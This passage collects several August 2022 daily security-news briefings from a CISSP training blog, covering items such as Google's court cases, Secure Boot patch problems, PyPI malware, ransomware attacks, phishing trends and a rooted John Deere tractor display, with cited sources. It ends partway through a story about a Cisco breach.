Site blog

by Les Bell - Wednesday, August 17, 2022, 5:56 PM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Google Wins One, Loses One

Last year, the Australian Competition and Consumer Commission has found that Google breached Australian consumer law during 2017 and 2018 by telling Android users that the only Google account setting that they needed to change in order to stop the search giant collecting PII location data was the 'Location History' setting. Unfortunately, another Google account setting, 'Web & App Activity' also needed to be turned off - it was turned on by default.

Now the Federal Court has ordered Google to pay $60 million in penalties for this breach. Fortunately for Google, the offence occurred before the maximum penalty for breaches of Australian consumer law was increased - from November 2018 it was increased to the higher of $10 million, three times the benefit obtained from the alleged conduct or otherwise, 10% of turnover.

On the other hand, in an appeal to the High Court, Google's argument that a search engine is not a publisher was successful. The High Court overturned two previous rulings that Google was a publisher and by refusing to take down a link, was guilty of defaming a Melbourne lawyer. Google's argument was that a hyperlink only communicates that something exists or where it exists, and that it is the operator of the web page who communicates the content to the user. In a majority ruling, the High Court agreed: "The provision of a hyperlink in the Search Result merely facilitated access to the ... article and was not an act of participation in the bilateral process of communicating the the contents of that article to a third party".

ACCC Media Team, Google LLC to pay $60 million for misleading representations, media release, 12 August 2022. Available online at https://www.accc.gov.au/media-release/google-llc-to-pay-60-million-for-misleading-representations.

Byrne, Elizabeth, High Court finds Google is not a publisher in crucial win for search engine, ABC News, 17 August 2022. Available online at https://www.abc.net.au/news/2022-08-17/high-court-decision-google-not-publisher-george-defteros/101340622.

Secure Boot Loader Causes More Problems

We previously wrote about problems with the Windows secure boot process being subverted by some vendors' code. Unfortunately, it seems the cure is worse than the disease, for some users at least.

Last week's patch, KB5012170, added the signatures of the vendors' files to the Secure Boot Forbidden Signature database, which contains the UEFI revocation list. However, systems which do not have a valid bootloader will generate a 0x800f0922 error and fail to install the patch - fortunate for the user, as the system would not boot if the patch was applied.

Other users are reporting that after the patch is applied, Windows 11 PC's are booting to a BitLocker recovery screen - not a problem if the user has the recovery key, but unfortunately they almost never do. In well-managed environments, a domain administrator can recover the key from Active Directory Domain Services.

Windows 10 users are reporting other problems - slow boot times or their RAID mode being changed to AHCI in the firmware settings, triggering a Blue Screen of Death.

Speed, Richard, Microsoft's Secure Boot fix sends some PCs into BitLocker Recovery, The Register 15 August 2022. Available online at https://www.theregister.com/2022/08/15/bitlocker_microsoft/.

Millions of Realtek-based Network Devices Vulnerable

Researchers from Argentinian company Faraday Security have demonstrated proof-of-concept code to exploit a vulnerability they have discovered in the Realtek RTL819x system-on-a-chip (SOC). This chip is used in millions of networking devices such as routers.

Ilascu, Ionut, Exploit out for critical Realtek flaw affecting many networking devices, Bleeping Computer, 16 August 2022. Available online at https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/.

Equifax Fallout Continues; SEC Charges Three

We have written previously about security governance requirements, and in particular the guidance issued by the SEC in February 2018, which seemed to have been triggered by their investigations of the infamous Equifax breach. The same incident continues to have repercussions, this time for a finance manager who worked at the public relations firm engaged by Equifax to assist with the breach, as well as her husband and his brother. The SEC alleges that upon learning of the breach, Ann M. Dishinger tipped off her husband, who arranged with a former business client to buy put options on Equifax on the understanding that they would split any profits realized. The SEC also alleges that he also helped his brother set up a similar arrangement with an old high school friend. These arrangements allegedly netted approximately $US108,000 in profits, split between the participants.

U.S. Securities and Exchange Commission, SEC Charges Three Chicago-Area Residents with Insider Trading Around Equifax Data Breach Announcement, Litigation Releast No. 25470, 16 August 2022. Available online at https://www.sec.gov/litigation/litreleases/2022/lr25470.htm.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons LicenseCopyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Wednesday, August 17, 2022, 8:10 PM ]
 
by Les Bell - Wednesday, August 17, 2022, 9:30 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


(ISC)2 Election Process Criticised

As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, point out some glaring flaws in the process:

  • The Board apparently changed the process for nomination after the election was announced.
  • This change was not announced to the membership.
  • Nevertheless 85 people submitted nominations to run, but
  • The Board reviewed these nominations, and then selected five candidates to run for the five open seats.

In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.

Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.

Ransomware Operators Hit UK Water Supplier

A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response Thames Water issued a statement via its website stating that it had not suffered a cyber-attack, and instead South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim of the attack. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.

Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.

Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.

PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox

Kaspersky, Snyk and Checkpoint have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Checkpoint used code in the _init_.py file of the setup script to download and run a script which would search for and exfiltrate local passwords.

The latest discoveries include 12 distinct pieces of malware belonging to the same actor, and uses PyInstaller to bundle a malicious application and its dependencies into one package which is then distributed via the Discord content delivery network, from where it infiltrates user browsers. It then exfiltrates passwords, cookies, web history and other data which the attackers can use to pivot to other targets using the stolen credentials.

The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.

Bezcershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.

Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.

Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Checkpoint Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.

Another Hardware Vulnerability in AMD processors

In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.

Gast, Stefan, et. al., SQUIIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.

Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.

Russian APT Phishes Defence, Intelligence, Academics

Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, thinktanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.

The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.

Lakshamanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.

Aussie Roots Tractor

Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEFCON attendees how to get privileged access to the CANBUS display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to their tractors' control systems, making repairs possible only via authorised dealers. It took researcher SickCodes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.

Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons LicenseCopyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Wednesday, August 17, 2022, 7:42 PM ]
 
by Les Bell - Tuesday, August 16, 2022, 8:49 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Signal Users' Number Compromised By Twilio Breach

The Twilio breach a couple of weeks ago revealed the phone numbers of 1,900 Signal users, according to an advisory published by Signal. The Signal encrypted messaging app uses Twilio for phone number verification, and this is how the numbers were leaked. However, message history, contact lists, profile information and other data were not compromised.

Signal is contacting the affected users and prompting them to re-register the Signal app - this is necessary because it was possible for the attackers to register these phone numbers to another device using an SMS verification code revealed by the breach.

Uncredited, Twilio Incident: What Signal Users Need to Know, Signal Support, August 2022. Available online at https://support.signal.org/hc/en-us/articles/4850133017242.

Zoom Update Vulnerability Exposes Mac Users

A nasty vulnerability in the automatic update feature of the Zoom videoconferencing app for Mac OS could grant attackers root access, security researcher Patrick Wardle revealed at DefCon on Saturday. Although initial installation of Zoom prompts for the user password, subsequent updates do not, because the updater runs as root. By feeding it a package with the right name, an attacker could either downgrade the zoom version or even install a trojan, earning the vuln a CVSS score of 8.8.

This is the most recent of a long series of vulnerabilities in Zoom; the company has released a patch which fixes this vulnerability but users really should not rely on the auto-update process to install it.

Purdy, Kevin, Update Zoom for Mac now to avoid root-access vulnerability, Ars Technica, 16 August 2022. Available online at https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/.

Zoom Security Bulletin ZSB-22018, Local Privilege Escalation in Zoom Client for Meetings for macOS, Zoom Inc., 13 August 2022. Available online at https://explore.zoom.us/en/trust/security/security-bulletin/.

Credential Theft Still Popular - Especially Callback Phishing

A new report from Ponemon Institute says that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks, backing similar results in the Verizon Data Breach Investigations Report. One leading cause: almost 60% of organizations do not revoke credentials once they are no longer needed, and these unused and unmonitored accounts are easy prey for attackers.

But as user awareness is improving resistance to simple phishing attacks, spear-phishers are increasing their use of hybrid techniques such as barrel-phishing and callback phishing. A report from Agari claims that while phishing attacks have increased by only 6% since Q1 2021, callback phishing has increased by 625%.

Toulas, Bill, Callback phishing attacks see massive 625% growth since Q1 2021, Bleeping Computer, 15 August 2022. Available online at https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-see-massive-625-percent-growth-since-q1-2021/.

Uncredited, Credential Theft Is (Still) A Top Attack Method, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/credential-theft-is-still-top-attack.html.

Uncredited, The State of Cybersecurity and Third-Party Remote Access Risk, SecureLink (sponsor), August 2022. Available online at https://www.securelink.com/research-reports/the-state-of-cybersecurity-and-third-party-remote-access-risk/ (registration required).

Android Banking Trojan Expands Capabilities and Reach

The SOVA (Russian for owl) banking trojan, which first appeared in September 2021, has continued to develop. The trojan uses the Accessibility Services feature of Android to overlay its own form fields over banking and shopping apps, and in its latest incarnation, SOVA v4, is able to intercept two-factor authentication codes and steal cookies. The operators have also expanded its targets from Spain and the US, where it was first seen, to Australia, Brazil, China, India, the Philippines and the UK.

Lakshamanan, Ravie, SOVA Android Banking Trojan Returns With New Capabilities and Targets, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/sova-android-banking-trojan-returns-new.html.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons LicenseCopyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Tuesday, August 16, 2022, 8:58 AM ]
 
by Les Bell - Monday, August 15, 2022, 8:29 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Microsoft Finally Reverses Advice on DogWalk

This story has been emerging for some time. Despite first claiming that the DogWalk vulnerability was not a security issue, Microsoft has now issued a patch for CVE-2022-34713 and is advising customers to install it as soon as possible. The patch was part of last week's Patch Tuesday (Wednesday in the Antipodes) update, so many users on an auto-update policy will already have installed it, but enterprise users may not yet have patched Windows Server systems.

The RCE vulnerability allows attackers to exploit the Microsoft Support Diagnostic Tool via either social engineering or phishing and has been known since January 2020, so this has been quite a long delay on Microsoft's part.

Trueman, Charlotte, Microsoft urges Windows users to run patch for DogWalk zero-day exploit, ComputerWorld, 11 August 2022. Available at https://www.computerworld.com/article/3669434/microsoft-urges-windows-users-to-run-patch-for-dogwalk-zero-day-exploit.html.

Massive Ransomware Outage Hit UK NHS

A service provider to the UK's National Health Service has been hit by a targeted ransomware attack, shutting down or slowing access to patient records, the 111 telephone advice service and the out-of-hours appointment booking system for general practices. Some urgent treatment centres and mental health providers have also been affected.

At the time of writing, the National Cyber Security Centre and the Information Commissioner's Office are both working to investigate the attack on service provider Advanced, but have not identified who is behind the attack. Idle speculation suggests that it could be any of several groups who have spun off from the Conti gang, but there are many others who have specialised in healthcare attacks, including BlackCat, Quantum, Hive and AvosLocker.

Full restoration of services could take some weeks, as data must be restored, systems reconfigured and updated, additional controls possibly installed, and the remediation plans approved by NHS Digital. The repercussions are likely to continue for even longer, as patient data may well have been exfiltrated.

36 different healthcare trusts use Advanced's services; while the NHS is able to achieve economies of scale through this kind of arrangement, this breach illustrates the danger of putting so many eggs in one basket.

Milmo, Dan and Denis Campbell, Fears for patient data after ransomware attack on NHS software supplier, The Guardian, 11 August 2022. Available online at https://www.theguardian.com/society/2022/aug/11/fears-patient-data-ransomware-attack-nhs-software-supplier.

9,000 Machines Online With No Passwords

VNC (virtual network computing) is a popular cross-platform software tool for providing graphical remote access for system installation, configuration and management - it is used to install SuSE Linux Enterprise Server on IBM zSeries mainframes, for example and is a popular alternative to SSH'ing to the command line for novice Linux system administrators.

Now security researchers at Cyble have discovered over 9,000 VNC endpoints which are not secured with a password, including SCADA and ICS systems such as water treatment plants, which could allow an attacker to remotely control pumps, causing all kinds of problems. While the systems are found all over the world, the majority are found in Sweden (perhaps unsurprising considering its size) with Sweden not far behind (surprising considering its size).

Toulas, Bill, Over 9,000 VNC servers exposed online without a password, Bleeping Computer, 14 August 2022. Available online at https://www.bleepingcomputer.com/news/security/over-9-000-vnc-servers-exposed-online-without-a-password/.

Want to Program? Go Python

The August edition of the TIOBE Index, which charts the popularity of different programming languages, shows that Python has now definitively passed long-time leaders C and Java. Although C and C++ did gain popularity, primarily for systems programming where performance is the key criterion in language selection, the all-round capability of Python will probably see it retain the top spot for some time to come.

Because Python features a REPL (Read, Evaluate, Print, Loop) interface which allows interactive execution, it is quite easy to learn its basic features. However, it can also compile its code for efficiency, and so the language is used in everything from small Raspberry Pi-based embedded systems through scripting applications for systems administration and reporting to scientific computing, data analysis and machine learning.

If asked to recommend which language security professionals should pick up for occasional use, the answer would have to be Python.

Other security-related language movements include the continued growth of safe systems-programming language Rust and the first appearance of Google's new C-derived language, Carbon.

Uncredited, TIOBE Index for August 2022: Python going through the roof, TIOBE (The Importance of Being Earnest), August 2022. Available online at https://www.tiobe.com/tiobe-index/.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons LicenseCopyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Tags:
 
by Les Bell - Friday, August 12, 2022, 7:55 PM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Companies Profit from Stolen Code

Macintosh malware researcher Patrick Wardle has found his code, released as open source, in a number of commercial products. As exhibit one, he cites a software tool he created back in 2016, called Oversight. The program monitors a Mac's microphone and webcam, to see whether any applications are accessing them without the knowledge of the owner (no surprise: a number were).

Several years later, Wardle was surprised to discover a number of commercial applications that were not only doing the same thing as Oversight, and in a similar way - they also contained the same bugs. When he approached the three companies involved, they all acknowledge that his code had been used without his consent, and they all eventually paid for rights.

Although it is likely that employees used the code without their employers' knowledge, it does bring to light a risk we sometimes overlook, and emphasizes the need to educate developers on free and open source software licensing.

Faife, Corin, This Mac hacker's code is so good, corporations keep stealing it, The Verge, 11 August 2022. Available online at https://www.theverge.com/2022/8/11/23301130/patrick-wardle-mac-code-corporations-stealing-black-hat.

Meta's In-App Browsers Inject Code to Track You Outside Facebook

Security researcher Felix Krause has investigated the behaviour of the Facebook and Instagram app browser component, and discovered that the app could track every interaction with external websites view from within it. The app injects JavaScript code into every website it renders - the code doesn't currently track everything, but it could monitor every button clicked, every link, all text selections and even form inputs, including passwords.

Now, I was pretty sure that I'd set an option in the Facebook app for Android to turn off the in-app browser, and use the Chrome browser instead - but looking for it now, any such setting seems to be quite deeply buried. So I, for one, welcome our new surveillance capitalism overlords.

Krause, Felix, iOS Privacy: Instagram and Facebook can track anything you do on any website in their in-app browser, Felix Krause blog, 10 August 2022. Available online at https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser.

Signed Secure UEFI Boot Loaders Not Trustworthy

The whole point of the Secure Boot process is to preserve a chain of trust that starts with the system's TPM chip and ends with a guaranteed-unmodified operating system. However, it turns out that three hardware vendors were somehow shipping UEFI boot loaders, signed by Microsoft, which were willing to bypass the process and execute arbitrary, unsigned, code. This would be the perfect way to install a rootkit, for example.

Fortunately, Microsoft's Patchday, earlier this week, saw updates shipped which fix the problem.

Lakshamanan, Ravie, Researchers Uncover UEFI Secure Boot Bypass in 3 Microsoft Signed Boot Loaders, The Hacker News, 12 March 2022. Available online at https://thehackernews.com/2022/08/researchers-uncover-uefi-secure-boot.html.

GitHub Proposes Adoption of SigStore for NPM

As more and more software distributors adopted cryptographic signing of the packages they distribute, GitHub has asked developers to comment on a proposal to adopt Sigstore for the Node Package Manager (npm) which distributes pJavaScript packages for node.js and related systems. SigStore is an open-souce project which operates public-key infrastructure to both sign packages and to verify signatures, something that is seen as essential to the integrity of the software supply chain.

Lemos, Robert, Software Supply Chain Chalks Up a Security Win With New Crypto Effort, Dark Reading, 13 August 2022. Available online at https://www.darkreading.com/application-security/software-supply-chain-chalks-up-security-win-with-crypto-effort.

Chinese Threat Actor Targets Linux, Mac IM Application

Chinese group APT 27, variously known as Iron Tiger, Emissary Panda and LuckyMouse), is alleged to have deployed a JavaScript trojan in a popular instant messaging app called "MiMi". The backdoor first identifies the OS platform of the victim system, then downloads a back door called rshell. This then exfiltrates system information to its C2 server and awaits commands to search for and upload files to the server.

Older versions of the trojanized "MiMi" app also targeted Windows systems. The campaign appears to be targeting Chinese expatriates, perhaps to monitor their activities in other countries. The same threat actor has previously conducted cyberespionage campaigns internationally, attacking defence, healthcare, energy and technology enterprises. They were among several groups exploiting the Microsoft Exchange ProxyLogon vulnerability last year.

Gatlan, Sergiu, Chinese hackers backdoor chat app with new Linux, macOS malware, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/chinese-hackers-backdoor-chat-app-with-new-linux-macos-malware/.

NSFW Section (It's Saturday)

Excremental Retribution Exposed

A web service which sent a box of animal faeces, along with personalised message, to enemies of their customers (because surely nobody would do this to their friends?) has been exploited by a customer who discovered an SQL injection vulnerability and downloaded the service's entire database.

Unfortunately for ShitExpress (I couldn't avoid saying it in the end), this customer was pompompurin, the owner of the Breached.co forum - exactly the kind of person who would spot a vulnerability - who was planning to use the service to send some dung to a rival security researcher. Instead, he shared the contents of the database on the forum, revealing the motherlode of abusive messages.

The moral of the story: shit doesn't just happen.

Sharma, Ax, Anonymous poop gifting site hacked, customers exposed, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/anonymous-poop-gifting-site-hacked-customers-exposed/.


And that's it for this week!

These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons LicenseCopyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Tags:
[ Modified: Saturday, August 13, 2022, 9:54 AM ]
 
by Les Bell - Thursday, August 11, 2022, 9:04 PM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Facebook Draws Ire of Privacy and Freedom of Choice Advocates

Facebook is being criticized for surrendering the private messages of a teenager and her mother who were planning to use (and did use) a pharmaceutical product to terminate a pregnancy. The teenager, her mother and a man who assisted with disposal of the fetus have been charged with a number of offences, following investigations by police in Madison County, Nebraska, who had obtained a warrant requiring disclosure of the contents of an electronic communication.

Police subsequently seized the girl's phone and computer and retrieved the body of the fetus, which had been stillborn. The circumstances of the case are not as clear-cut as pro-choice advocates might like - the abortion was performed at 28 weeks gestation, which could be a crime prior to the contentious recent changes brought about by the US Supreme Court - but it does illustrate the way in which more recent cases will be prosecuted, with the cooperation of tech service providers.

The problem here is not Facebook; no US-based company, or company that operates in the US, be it a social media company, an email service provider, a messaging company or a telco, has the power to resist a warrant or court order issued by a US court. Those who seek privacy protections are going to have to use international service providers and also make use of encryption.

Koebler, Jason and Anna Merlan, This Is the Data Facebook Gave Police to Prosecute a Teenager for Abortion, Vice Motherboard, 9 August 2022. Available online at https://www.vice.com/amp/en/article/n7zevd/this-is-the-data-facebook-gave-police-to-prosecute-a-teenager-for-abortion.

Snort Rule Snafu Snookers Office 365

A Snort rule update pushed to Cisco Meraki firewalls accidentally blocked access to Microsoft Office 365. The Snort rule, 1-60381, is commented, "Microsoft Windows IIS denial-of-service attempt" and blocked a number of IP addresses belonging to Microsoft. Disabling the rule restored access, and Cisco has now pushed out an update.

What can we say, but: measure twice and cut once.

GiacomoS, [RESOLVED] Microsoft vulnerability and IPS/SNORT, Meraki Community forum, 11 August 2022. Available online at https://community.meraki.com/t5/Meraki-Service-Notices/RESOLVED-Microsoft-vulnerability-and-IPS-SNORT/ba-p/156649.

Microsoft 365 Status, We're working with our firewall partners to investigate snort rule 1-60381, Twitter thread, 11 August 2022. Available online at https://twitter.com/MSFT365Status/status/1557435310874587136.

SIM Box Used to Blast Smishes

The Australian Federal Police arrested two men who had allegedly used a SIM box to send out hundreds of thousands of SMS phishing messages which linked to fake bank and telco sites in order to capture the victims credentials. The AFP allege the pair had been targeting customers of the Commonwealth Bank of Australia, National Australia Bank and Telstra since 2018.

A SIIM box can hold hundred of SIM cards and can send hundreds of thousands of SMS messages per day.

Noyes, Jenny, Phishing fraudsters used SIM box to fleece hundreds of victims, police allege, Sydney Morning Herald, 11 August 2022. Available online at https://www.smh.com.au/national/nsw/phishing-fraudsters-used-sim-box-to-fleece-hundreds-of-victims-police-allege-20220811-p5b8xv.html.

Ethical Question: Should We Build Quantum Computers?

Quantum physicist Emma McKay, a PhD student at McGill University, is concerned about how people practice science and develop technology. In an interview with the American Physical Society, she expresses the controversial view that perhaps we should not build quantum computers at all. McKay points out that one of the main applications of quantum computers is the optimization of financial market trades - essentially, making the rich richer. Then there are the possible military applications of quantum computers.

On the other hand, quantum annealing - the type of quantum computer currently sold by Canadian company D-Wave - might have wide application in optimization problems. But, says McKay, this might simply be used to optimize traffic flows for single-occupant vehicles, when a better approach from an environmental and economic point of view might be to promote public transport as well as bicycling infrastructure.

Do you remember the Ten Commandments of the Computer Professionals for Social Responsibility? The 9th Commandment says, "Thou shalt think about the social consequences of the program you are writing or the system you are designing". And then remember Shakespeare: it is "more honoured in the breach than in the observance". A timely reminder.

Chen, Sophia, Should We Build Quantum Computers at All?, American Physical Society News, 8 August 2022. Available online at https://www.aps.org/publications/apsnews/202209/build-quantum.cfm.

Ransomware Gang More Trouble Than Ever

The remnants of the Conti ransomware gang have continued to cause more trouble for enterprises all over the world. Several groups have spun off and are operating independently, using the BazarCall tactic pioneered by Conti to gain access to victims' networks.

BazarCall, also known as call-back phishing, starts with an email telling the recipient that a subscription is about to renew, but the payment can be cancelled by calling a particular number. The number is answered by a social engineer, who convinces the caller to start a remote access session, which will be used by a network intruder to scout the network defences and deploy tools which will not be detected.

At least three groups - called Silent Ransom Group, Quantum and Roy/Zeon - are using this technique, which allows them to defeat sophisticated automated defences.

So damaging have these attacks become that the US State Department is offering a $US10 million reward for information on five of the ransomware gang members. Posting a photo of the hacker known as 'Target', the State Department is asking for information about him and four other members known as 'Tramp', 'Dandis', 'Professor' and 'Reshaev' - the information to be provided via a Tor anonymizing network link.

The success of the BazarCall technique's social engineering carries a message: we cannot pin all our hopes on technical controls; when the human becomes the weakest link, we must ramp up our efforts in security education, training and awareness.

Abrams, Lawrence, US govt will pay you $10 million for info on Conti ransomware members, Bleeping Computer, 11 August 2022. Available online at https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/.

Ilascu, Ionut, Conti extortion gangs behind surge of BazarCall phishing attacks, Bleeping Computer, 10 August 2022. Available online at https://www.bleepingcomputer.com/news/security/conti-extortion-gangs-behind-surge-of-bazarcall-phishing-attacks/.

HTTP Request Smuggling Attacks

In a paper released via a Black Hat talk today, PostSwigger Director of Research James Kettle has expanded his previous work on attacks against web servers to show how the same techniques can be used to exploit vulnerabilities in the HTTP/2 request handling of browsers.

The techniques utilized are somewhat too involved to detail here, and rely on interactions between the HTTP/1.1 and /2 and TCP protocols, along with the behaviour of reverse proxies and web content accelerators. For those interested, there's lots of good reading in the references below, while for everyone else, expect updates to popular web server software and browsers as the Bad Guys enjoy reading the same references and develop related exploits.

Kettle, James, Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling, white paper, 10 August 2022. Available online at https://portswigger.net/research/browser-powered-desync-attacks.

Vijayan, Jai, New HTTP Request Smuggling Attacks Target Web Browser, Dark Reading, 11 August 2022. Available online at https://www.darkreading.com/application-security/researcher-at-black-hat-describes-new-htpp-request-smuggling-attack.

Open Source Threat Intelligence - Not As Open As You'd Think

An article by three security researchers from Samsung Research in IEEE Security & Privacy points out that we should be wary of licensing conditions on open-source threat intelligence feeds. In many cases, the information is provided for personal, informational and research purposes only, and in some cases, the site or feed has no licence information or terms of service at all - in which case, no-one can use, copy, modify or distribute the information. In other cases, the meaning of terms like commercial use is unclear, making use risky.

Shim, WooChul, Hyejin Shin and Yong Ho Hwang, On Data Licenses for Open Source Threat Intelligence, IEEE Security & Privacy, Vol 20 No. 4, July/August 2022, pp. 8 - 22. Digital Object Identifier 10.1109/MSEC.2021.3127218.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons LicenseCopyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Friday, August 12, 2022, 7:46 PM ]
 
by Les Bell - Thursday, August 11, 2022, 9:38 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Cisco Corporate Network Breached by Ransomware Gang

The group, called Yanluowang, managed to exfiltrate some files from one employee's Box folder, and then attempted to extort the networking company. However, it took some work for them to get this far - the attackers had to use a whole series of voice phishing attacks and forged multi-factor authentication push notifications to finally trick a victim into handing over the credentials for his Google account.

